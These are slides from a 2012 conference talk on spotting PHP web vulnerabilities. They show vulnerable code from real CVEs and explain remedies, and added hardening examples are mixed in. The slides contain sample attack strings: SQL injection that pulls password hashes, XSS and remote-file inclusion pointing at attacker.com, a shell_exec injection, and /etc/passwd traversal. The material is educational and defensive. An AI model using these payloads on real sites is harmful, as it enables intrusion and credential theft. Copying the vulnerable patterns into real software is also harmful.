Spot the Web Vulnerability

These are the slides from the talk "Spot the Web Vulnerability" given at the Hacktivity 2012 conference (Budapest, Hungary, 12th–13th October 2012) by Miroslav Stampar.


Spot the Web Vulnerability

  1. Spot the Web Vulnerability
      Miroslav Štampar (dev@sqlmap.org)

  2. Talk overview
      - Introduction to commonly exploited web application vulnerability classes (covering only those caused by coding mistake(s))
      - Usage of code review on real-life vulnerabilities as an educational tool
      - Mitigation in the form of remedies
      Note: While the given examples discuss PHP code (due to its overwhelming popularity on the Web), the concepts also apply to any other web programming language.
      October 13th, 2012

  3. Vulnerability statistics (1)

  4. Vulnerability statistics (2)

      | Name | Visits | Platform | Date |
      |---|---|---|---|
      | vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability | 31961 | php | 2010-08-29 |
      | WordPress <= 3.3.1 Multiple Vulnerabilities | 25960 | php | 2012-01-25 |
      | WordPress 3.1.3 SQL Injection Vulnerabilities | 25168 | php | 2011-07-01 |
      | Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day | 24166 | php | 2011-07-21 |
      | vBulletin(R) 3.8.6 faq.php Information Disclosure Vulnerability | 22850 | php | 2010-07-24 |
      | vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability | 19074 | php | 2011-05-23 |
      | Bypass the JQuery-Real-Person captcha plugin 0-day | 17089 | php | 2011-11-28 |
      | FCKeditor all version Arbitrary File Upload Vulnerability | 16211 | php | 2011-08-09 |
      | Joomla 1.5 URL Redirecting Vulnerability | 16061 | php | 2010-08-24 |
      | WordPress TimThumb Plugin - Remote Code Execution | 15991 | php | 2011-08-03 |

  5. SQL injection (1)
      - Vulnerability in dynamic database queries that include unfiltered user-supplied input
      - Usually the result of concatenating raw parameter values into the desired SQL statement
      - Various techniques are used depending on the target's environment and the affected vulnerable query
      - The goal is unauthorized access to the underlying database
      - Involved in 60% of all breach incidents examined by 7Safe in 2010

  6. SQL injection (2)
      Example of vulnerable code (vuln.php):

      ```php
      <?php
      ...
      $sql = "SELECT * FROM forum_logs WHERE id = " . $_GET["id"];
      $result = mysql_query($sql);
      ...
      ?>
      ```

      Sample attack:
      http://www.target.com/vuln.php?id=1 UNION ALL SELECT NULL,CONCAT(user,0x3a,password),NULL FROM mysql.user--

  7. Cross-site scripting (1)
      - Enables attackers to inject client-side script into web pages viewed by other users
      - Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible
      - Persistent (stored) and non-persistent (reflected) variants
      - Samy (JS.Spacehero), the first known XSS worm, infected over 1 million MySpace profiles in less than 20 hours

  8. Cross-site scripting (2)
      Example of vulnerable code (vuln.php):

      ```php
      <?php
      $name = $_GET['name'];
      echo "Welcome $name<br>";
      echo "<a href=\"http://www.site.com/\">Click to Visit</a>";
      ?>
      ```

      Sample attack:
      http://www.target.com/vuln.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://www.attacker.com/";}</script>

  9. File inclusion (1)
      - Allows inclusion of arbitrary code into the vulnerable application for further execution
      - Local file (LFI) and remote file (RFI) variants
      - Attacker's fondest wish (especially RFI)
      - Access anything that the original program context is able to (configuration files, password files, etc.)
      - Involved in 21% of all web application attacks observed by Imperva in 2011

  10. File inclusion (2)
      Example of vulnerable code (vuln.php):

      ```php
      <?php
      $page = 'index';
      if (isset($_REQUEST['page']))
          $page = $_REQUEST['page'];
      include($page . '.php');
      ?>
      ```

      Sample attack:
      http://www.target.com/vuln.php?page=http://www.attacker.com/shell.php?foo=

  11. File disclosure (1)
      - Access files that are not intended to be accessible and expose their content to the attackers
      - Directory traversal variant in cases when characters for traversing to the parent directory (e.g. ../) are passed through to the file API(s)
      - Local file inclusion becomes a variant too if used for obtaining non-script content
      - Easiest to exploit

  12. File disclosure (2)
      Example of vulnerable code (vuln.php):

      ```php
      <?php
      $template = 'default.php';
      if (isset($_COOKIE['template']))
          $template = $_COOKIE['template'];
      readfile("templates/" . $template);
      ?>
      ```

      Sample attack:

      ```
      GET /vuln.php HTTP/1.0
      Cookie: template=../../../../../../../../../etc/passwd
      ```

  13. Remote code execution (1)
      - Provides a way to execute arbitrary code
      - In one variant the provided code is executed inside the vulnerable web application (e.g. eval)
      - In the other, more common one, the content of one of the request parameters is written to a browser-reachable file, giving the attacker the opportunity to run it as a standalone script
      - The TimThumb WordPress PHP plugin vulnerability (CVE-2011-4106) affected 1.2 million websites

  14. Remote code execution (2)
      Example of vulnerable code (vuln.php):

      ```php
      <?php
      $fp = fopen("prefs/timezone.php", "w");
      fwrite($fp, "<?php\r\n\$timezone=" . $_REQUEST['tz'] . ";\r\n?>");
      fclose($fp);
      ?>
      ```

      Sample attack:
      http://www.target.com/vuln.php?tz=us;shell_exec($_GET[cmd])
      http://www.target.com/prefs/timezone.php?cmd=cat /etc/passwd
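How the "write request data into a PHP file" pattern of slide 14 can be hardened, as an added example that is not from the slides. The function names, the preferences path and the sample values are assumptions made for this illustration. Two independent defenses are shown: an allow-list check against the timezone identifiers PHP itself knows, and `var_export()`, which turns the value into a quoted PHP literal so that it can never terminate the string and become code; a JSON variant then avoids writing executable code at all.

```php
<?php
// Added example, not from the slides. Hardening of the slide 14 pattern.
// Defence 1: allow-list. Defence 2: never splice raw text into source code.

function save_timezone_pref(string $tz, string $prefsFile): bool
{
    // 1. Allow-list: anything that is not a known timezone identifier is rejected.
    if (!in_array($tz, timezone_identifiers_list(), true)) {
        return false;
    }
    // 2. Defence in depth: var_export() emits a single-quoted literal with quotes and
    //    backslashes escaped, so even a value that slipped past the allow-list stays data.
    $code = "<?php\n\$timezone = " . var_export($tz, true) . ";\n";
    // LOCK_EX avoids a torn file when two requests write at the same time.
    return file_put_contents($prefsFile, $code, LOCK_EX) !== false;
}

// Alternative that removes the problem entirely: store a data file, not a code file.
function save_timezone_pref_json(string $tz, string $prefsFile): bool
{
    if (!in_array($tz, timezone_identifiers_list(), true)) {
        return false;
    }
    $json = json_encode(['timezone' => $tz], JSON_THROW_ON_ERROR);
    return file_put_contents($prefsFile, $json, LOCK_EX) !== false;
}

// Self-check with constructed inputs (run: php this_file.php).
$dir = sys_get_temp_dir() . '/prefs_demo_' . getmypid();   // assumed, throw-away location
mkdir($dir, 0700);

var_dump(save_timezone_pref('Europe/Budapest', "$dir/timezone.php"));
var_dump(save_timezone_pref("us;shell_exec(\$_GET['cmd'])", "$dir/timezone.php"));
echo file_get_contents("$dir/timezone.php");

var_dump(save_timezone_pref_json('Europe/Budapest', "$dir/timezone.json"));
echo file_get_contents("$dir/timezone.json"), "\n";

unlink("$dir/timezone.php");
unlink("$dir/timezone.json");
rmdir($dir);
```

The second `save_timezone_pref()` call is refused by the allow-list, so the file still contains only the earlier, valid value; had the allow-list been absent, `var_export()` would have written the whole string as one quoted literal rather than as code.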
  15. Spot SQL injection (1)
      OpenConf <= 4.11 (EDB-ID: 18820, CVE: 2012-1002, OSVDB-ID: 78996)

      ```php
      if (isset($_POST['authornum']) && ctype_digit($_POST['authornum'])) {
          $oc_authorNum = $_POST['authornum'];
      } else {
          $anr = ocsql_query("SELECT * FROM `" . OCC_TABLE_PAPER . "` WHERE `paperid`=" . safeSQLstr($_POST['pid'])) or err("Unable to retrieve submission information");
          if (mysql_num_rows($anr) != 1) {
              err(oc_('Submission ID or password entered is incorrect'));
          }
      ```

  16. Spot SQL injection (2)
      MyTickets <= v2.0.8 (EDB-ID: 19264, OSVDB-ID: 83231)

      ```php
      if (empty($cookies['language'])) {
          setcookie('MyTickets_language', $setting['default_language'], time() + 86400, "/");
          $language = $setting['default_language'];
      } else {
          if ($db->count('languages', "`id`='" . $cookies['language'] . "'") == 0) {
              $language = $setting['default_language'];
          }
          $language = $cookies['language'];
      }
      $language_array = $db->fetch($db->query("SELECT * FROM `languages` WHERE `id`='" . $language . "'"));
      ```

  17. Spot SQL injection (3)
      WP-Predict Plugin for WordPress <= v1.0 (EDB-ID: 19715, OSVDB-ID: 83697)

      ```php
      foreach ($postPredicts as $postPredict) {
          ...
          if ($_POST['postAction'] == "submitVote" && intval($_POST['predictId']) == $postPredict->predictId) {
              $submitPredictId = $_POST['predictId'];
              $selectedOption = $_POST['predictSelection'];
              ...
              $dbResult = @$wpdb->query("INSERT INTO " . $wpdb->prefix . "wpp_predict_votes (predictEntryId, predictUserId, predictSelectedOption) VALUES (" . $submitPredictId . ", " . $user_ID . ", " . $selectedOption . ")");
              ...
          }
      ```

  18. Spot SQL injection (4)
      phpDenora <= v1.4.6 (EDB-ID: 18516, OSVDB-ID: 79497)

      ```php
      $start['year'] = isset($_GET['sy']) ? htmlspecialchars($_GET['sy']) : date('Y');
      $start['month'] = isset($_GET['sm']) ? htmlspecialchars($_GET['sm']) : date('m');
      $start['day'] = isset($_GET['sd']) ? htmlspecialchars($_GET['sd']) : date('d');
      ...
      $sidq = sql_query("SELECT `id` FROM $table WHERE year = '" . $start['year'] . "' AND month = '" . $start['month'] . "' AND day = '" . $start['day'] . "'");
      ```

  19. Spot SQL injection (5)
      AdRotate Plugin for WordPress <= v3.6.6 (EDB-ID: 18114, CVE: 2011-4671, OSVDB-ID: 77507)

      ```php
      if (isset($_GET['track']) OR $_GET['track'] != '') {
          $meta = base64_decode($_GET['track']);
          ...
          list($ad, $group, $block) = explode("-", $meta);
          ...
          $bannerurl = $wpdb->get_var($wpdb->prepare("SELECT `link` FROM `" . $prefix . "adrotate` WHERE `id` = " . $ad . " LIMIT 1;"));
          ...
      }
      ```

  20. Spot SQL injection (6)
      WP Bannerize Plugin for WordPress <= v2.8.7 (EDB-ID: 17906, OSVDB-ID: 76658)

      ```php
      if (@isset($_SERVER['HTTP_X_REQUESTED_WITH'])) {
          ...
          $limit = intval($_POST['limit']);
          $page_offset = (intval($_POST['offset']) - 1) * $limit;
          foreach ($_POST["item"] as $key => $value) {
              $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix . "bannerize_b", (intval($key) + $page_offset), $value);
              $result = mysql_query($sql);
          }
      }
      ```

  21. Spot cross-site scripting (1)
      PHPDug <= v2.0.0 (EDB-ID: 11017, OSVDB-ID: 61594)

      ```php
      $page = new HtmlTemplate("templates/" . $config['tpl_name'] . "/index.html");
      ...
      $page->SetParameter('UPCOMING_LINK', $config['site_url'] . 'upcoming.php?id=' . $_GET['id']);
      $page->SetParameter('POPULAR_LINK', $config['site_url'] . 'index.php');
      ...
      $page->CreatePageEcho($lang, $config);
      ```

  22. Spot cross-site scripting (2)
      WordPress <= v2.8.1 (EDB-ID: 9250, CVE: 2009-2851, OSVDB-ID: 56193)

      ```php
      function _wp_comment_row($comment_id, $mode, $comment_status, $checkbox = true, $from_ajax = false) {
          $comment = get_comment($comment_id);
          ...
          $author_url = get_comment_author_url();
          ...
          $author_url_display = $author_url;
          ...
          echo "<a title='$author_url' href='$author_url'>$author_url_display</a><br/>";
          ...
      }
      ...
      foreach ($comments as $comment)
          _wp_comment_row($comment->comment_ID, $mode, $comment_status);
      ```

  23. Spot cross-site scripting (3)
      damianov.net Shoutbox <= v1.0 (EDB-ID: 12593)

      ```php
      $handle = fopen($shoutsFile, "a");
      $toWrite = "\n" . stripslashes($_POST["txtNick"]) . "|" . $_POST["txtEmail"] . "|" . stripslashes($_POST["txtShout"]);
      fwrite($handle, $toWrite);
      fclose($handle);
      ...
      $lines = array_reverse(file($shoutsFile));
      foreach ($lines as $line_num => $line) {
          $info = explode("|", $line, 3);
          if ((is_email($info[1])) && $displayEmails)
              $info[0] = "<a href='mailto:" . $info[1] . "'>" . $info[0] . "</a>";
          echo "<div style='$fontStyle'><b>$info[0]</b> : " . ($allowHTML ? $info[2] : strip_tags($info[2])) . "</div>\n"; // CVE-2004-0595 (strip_tags() bypass)
      }
      ```

  24. Spot file inclusion (1)
      Zen Cart <= v1.3.9f (EDB-ID: 15166, OSVDB-ID: 68300)

      ```php
      $typefilter = 'default';
      if (isset($_GET['typefilter']))
          $typefilter = $_GET['typefilter'];
      require(DIR_WS_INCLUDES . zen_get_index_filters_directory($typefilter . '_filter.php'));
      ```

  25. Spot file inclusion (2)
      phpMyBackupPro <= v2.2 (EDB-ID: 19550, OSVDB-ID: 83700)

      ```php
      if (isset($_POST['lang']) && preg_replace("#.*/#", "", $_SERVER['PHP_SELF']) == "config.php")
          $CONF['lang'] = $_POST['lang'];
      if (!isset($CONF['lang']))
          $CONF['lang'] = "english";
      if (!file_exists($prepath . PMBP_LANGUAGE_DIR . $CONF['lang'] . ".inc.php"))
          include_once($prepath . PMBP_LANGUAGE_DIR . "english.inc.php");
      else
          include($prepath . PMBP_LANGUAGE_DIR . $CONF['lang'] . ".inc.php");
      ```

  26. Spot file inclusion (3)
      Relocate Upload Plugin for WordPress <= v0.14 (EDB-ID: 17869, CVE: 2012-1205, OSVDB-ID: 79250)

      ```php
      if (isset($_GET['ru_folder'])) {
          define('WP_USE_THEMES', false);
          require_once(urldecode($_GET['abspath']) . '/wp-load.php');
          ...
      }
      ```

  27. Spot file disclosure (1)
      ISPworker <= v1.23 (EDB-ID: 10262)

      ```php
      header('Content-type: ' . $_REQUEST['type']);
      header('Content-Disposition: attachment; filename="' . $_REQUEST['filename'] . '"');
      readfile("./tmp/$ticketid" . "_" . $_REQUEST['filename']);
      ```

  28. Spot file disclosure (2)
      PICA Photo Gallery Plugin for WordPress <= v1.0 (EDB-ID: 19016, OSVDB-ID: 82702)

      ```php
      $timg = $imgname = $_REQUEST['imgname'];
      $pluginName = 'pica-photo-gallery';
      $file = dirname(dirname(dirname(__FILE__))) . "/uploads/" . $pluginName . "/" . $timg;
      header('Content-Description: File Transfer');
      header('Content-Type: application/octet-stream');
      ...
      header('Content-Length: ' . filesize($file));
      ob_clean();
      flush();
      readfile($file);
      ```
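The remedy for the file disclosure cases of slides 12, 27 and 28 (and, with the same containment check, for the include paths of slides 24 to 26) is to confine the requested name to a fixed base directory before any file API sees it. The following is an added example, not code from the slides or from the plugins discussed; the function names and the temporary directory layout are assumptions made for this illustration. The untrusted value must be a bare file name, the full path is canonicalised with `realpath()` (which also resolves symbolic links), and the result must still lie inside the base directory before `readfile()` is called.

```php
<?php
// Added example, not from the slides. Path containment for a download handler.

function resolve_contained_path(string $baseDir, string $untrusted): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                      // base directory itself is missing
    }
    // Reject NUL bytes and anything that is not a plain file name:
    // no directory separators, no "", no "." or "..".
    if (strpos($untrusted, "\0") !== false
        || basename($untrusted) !== $untrusted
        || $untrusted === '' || $untrusted === '.' || $untrusted === '..') {
        return null;
    }
    $full = realpath($base . DIRECTORY_SEPARATOR . $untrusted);
    // realpath() follows symlinks, so a link that points outside the base is caught as well.
    if ($full === false || strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return is_file($full) ? $full : null;
}

function send_file(string $baseDir, string $untrusted): bool
{
    $path = resolve_contained_path($baseDir, $untrusted);
    if ($path === null) {
        http_response_code(404);          // do not reveal why the name was refused
        return false;
    }
    // Fixed content type and an encoded file name: the client controls neither header.
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
    return true;
}

// Self-check with a constructed directory layout (run: php this_file.php).
$base = sys_get_temp_dir() . '/uploads_demo_' . getmypid();   // assumed, throw-away location
mkdir($base, 0700);
file_put_contents("$base/photo.jpg", 'constructed file content');

$names = ['photo.jpg', '../../../../etc/passwd', "photo.jpg\0.txt", 'sub/photo.jpg', '..', 'missing.jpg'];
foreach ($names as $name) {
    printf("%-26s => %s\n", addcslashes($name, "\0"), resolve_contained_path($base, $name) ?? 'rejected');
}

unlink("$base/photo.jpg");
rmdir($base);
```

Only `photo.jpg` resolves; every traversal, NUL-byte, sub-path and non-existent name is rejected before a file API is touched. The allow-list of valid template or language names used by the application (slides 12 and 25) is a stricter alternative when the set of files is known in advance.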
  29. Spot remote code execution (1)
      WebCalendar <= v1.2.4 (EDB-ID: 18775, CVE: 2012-1495, OSVDB-ID: 81329)

      ```php
      $file = '../includes/settings.php';
      ...
      $settings['single_user_login'] = getPostValue('form_single_user_login');
      ...
      $fd = @fopen($file, 'w+b', false);
      ...
      fwrite($fd, "<?php\r\n");
      fwrite($fd, '/* updated via install/index.php on ' . date('r') . "\r\n");
      foreach ($settings as $k => $v) {
          if ($v != '<br />' && $v != '')
              fwrite($fd, $k . ': ' . $v . "\r\n");
      }
      ```

  30. Spot remote code execution (2)
      Ajax File and Image Manager <= v1.0 (EDB-ID: 18075, CVE: 2011-4825, OSVDB-ID: 76928)

      ```php
      @ob_start();
      displayArray($_POST);
      writeInfo(@ob_get_clean());
      ...
      function writeInfo($data, $die = false) {
          $fp = @fopen(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'data.php', 'w+');
          @fwrite($fp, $data);
          @fwrite($fp, "\n\n" . date('d/M/Y H:i:s'));
          @fclose($fp);
          ...
      }
      ```

  31. Remedies (1)
      Data validation
      - Process of ensuring that the application is running with correct data
      - Discard the data if it doesn't pass the validation process

      ```php
      if (!preg_match('/^\(?\d{3}\)?[-\s.]?\d{3}[-\s.]\d{4}$/', $phone)) {
          echo "Your phone number is invalid";
          die();
      }
      ```

  32. Remedies (2)
      Data sanitization
      - Removing any unwanted bits from the data and normalizing it to the correct form

      ```php
      $comment = strip_tags($_POST['comment']);
      ...
      $id = intval($_GET['id']);
      ...
      $username = preg_replace('/[^a-zA-Z0-9._]/', '', $_REQUEST['username']);
      ...
      $query = sprintf("SELECT * FROM users WHERE user='%s' AND password='%s'", mysql_real_escape_string($user), mysql_real_escape_string($password));
      ```

  33. Remedies (3)
      Output escaping
      - Protecting the integrity of displayed data
      - Prevents the browser from applying any unintended meaning to special character sequences that may be found in it
      - Always escape output provided by users!

      ```php
      echo "You searched for: " . htmlspecialchars($_GET["query"], ENT_QUOTES);
      ```
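Output escaping applied to the two contexts that appear in slides 8 and 22, as an added example that is not code from the slides; the helper names and the sample inputs are assumptions made for this illustration. `htmlspecialchars()` with `ENT_QUOTES` neutralises `<`, `>`, `&` and both quote characters in text and attribute values, which covers the slide 8 case. It does not, however, make a user-supplied URL safe inside `href`: a `javascript:` URL contains no special characters to escape, so the slide 22 case additionally needs a scheme allow-list before the escaped value is placed in the attribute.

```php
<?php
// Added example, not from the slides. Context-aware output escaping.

// Text and attribute-value context.
function e(string $s): string
{
    // ENT_QUOTES: both quote styles are escaped, so the value is safe in any quoted attribute.
    // ENT_SUBSTITUTE: invalid UTF-8 is replaced instead of turning the whole output into "".
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// URL-in-href context: allow-list the scheme first, then escape for the attribute.
function safe_href(string $url, array $allowedSchemes = ['http', 'https', 'mailto']): ?string
{
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (!is_string($scheme)) {
        return null;                       // relative or malformed URL: refuse rather than guess
    }
    if (!in_array(strtolower($scheme), $allowedSchemes, true)) {
        return null;                       // javascript:, data:, vbscript: ... end here
    }
    return e($url);
}

// The slide 22 link, rebuilt: escaped label, allow-listed and escaped href,
// and a plain-text fallback when the URL is not acceptable.
function render_comment_author(string $name, string $url): string
{
    $href = safe_href($url);
    $label = e($name);
    return $href === null
        ? "<span>$label</span>"
        : "<a href=\"$href\" title=\"$href\">$label</a>";
}

// Constructed inputs (run: php this_file.php).
$cases = [
    ['Alice', 'https://example.com/'],
    ['<script>window.onload = function() {}</script>', 'https://example.com/'],
    ['"><b>not bold</b>', 'http://example.com/?q=a&b=c'],
    ['Bob', 'javascript:alert(1)'],
    ['Carol', 'JAVASCRIPT:alert(1)'],
    ['Dave', '/relative/path'],
];
foreach ($cases as [$name, $url]) {
    echo render_comment_author($name, $url), "\n";
}
```

The second case shows the slide 8 payload shape rendered as inert text; the last three show why escaping alone is not enough for `href`: the `javascript:` URLs (in either letter case) and the relative path fall back to a `<span>`, while the `&` in the accepted URL is escaped to `&amp;` for the attribute context.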
  34. Remedies (4)
      Safe communication with a database
      - Prepared statements use one channel for commands and another one for data (which never allows commands)

      ```php
      $db = new PDO('dblib:host=localhost; dbname=testdb; charset=UTF-8', $user, $pass);
      $query = 'SELECT * FROM users WHERE id = :id';
      $stmt = $db->prepare($query);
      $stmt->bindValue(':id', $_REQUEST['id']);
      $stmt->execute();
      while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
          ...
      ```
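The slide 6 query rebuilt both ways, as an added example that is not code from the slides: once with string concatenation and once as a prepared statement with data validation (slide 31) in front of it. It runs against an in-memory SQLite database so the difference can be observed offline; the table, the rows and the sample inputs are constructed for the demonstration. Slide 34 uses a `dblib` DSN, but `prepare()`, `bindValue()` and `execute()` are the same calls for every PDO driver.

```php
<?php
// Added example, not from the slides. Concatenated query vs. prepared statement.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// With pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES to false so that the server,
// not the client library, separates the SQL text from the bound values.

// Constructed schema and rows.
$db->exec('CREATE TABLE forum_logs (id INTEGER PRIMARY KEY, message TEXT)');
$db->exec("INSERT INTO forum_logs VALUES (1, 'first entry'), (2, 'second entry'), (3, 'third entry')");

// The slide 6 pattern: the parameter value becomes part of the SQL text.
function fetch_log_vulnerable(PDO $db, string $id): array
{
    $sql = 'SELECT * FROM forum_logs WHERE id = ' . $id;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Remedy: the SQL text is fixed at prepare() time; the value travels separately
// and is only ever treated as data. Validation in front of it rejects junk early.
function fetch_log_safe(PDO $db, string $id): array
{
    if (!ctype_digit($id)) {
        return [];                        // data validation (slide 31): not an integer, refuse
    }
    $stmt = $db->prepare('SELECT * FROM forum_logs WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs (run: php this_file.php).
$benign  = '2';
$tainted = '2 OR 1=1';                     // the slide 6 kind of value, in its simplest form

printf("concatenated, benign : %d row(s)\n", count(fetch_log_vulnerable($db, $benign)));
printf("concatenated, tainted: %d row(s)\n", count(fetch_log_vulnerable($db, $tainted)));
printf("prepared,     benign : %d row(s)\n", count(fetch_log_safe($db, $benign)));
printf("prepared,     tainted: %d row(s)\n", count(fetch_log_safe($db, $tainted)));
```

The concatenated version returns every row for the tainted value because the `OR 1=1` became part of the WHERE clause; the prepared version returns no rows, and would return at most the one matching row even if the validation step were removed, because the bound value can only ever be compared against `id`, never parsed as SQL.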
  35. Questions?
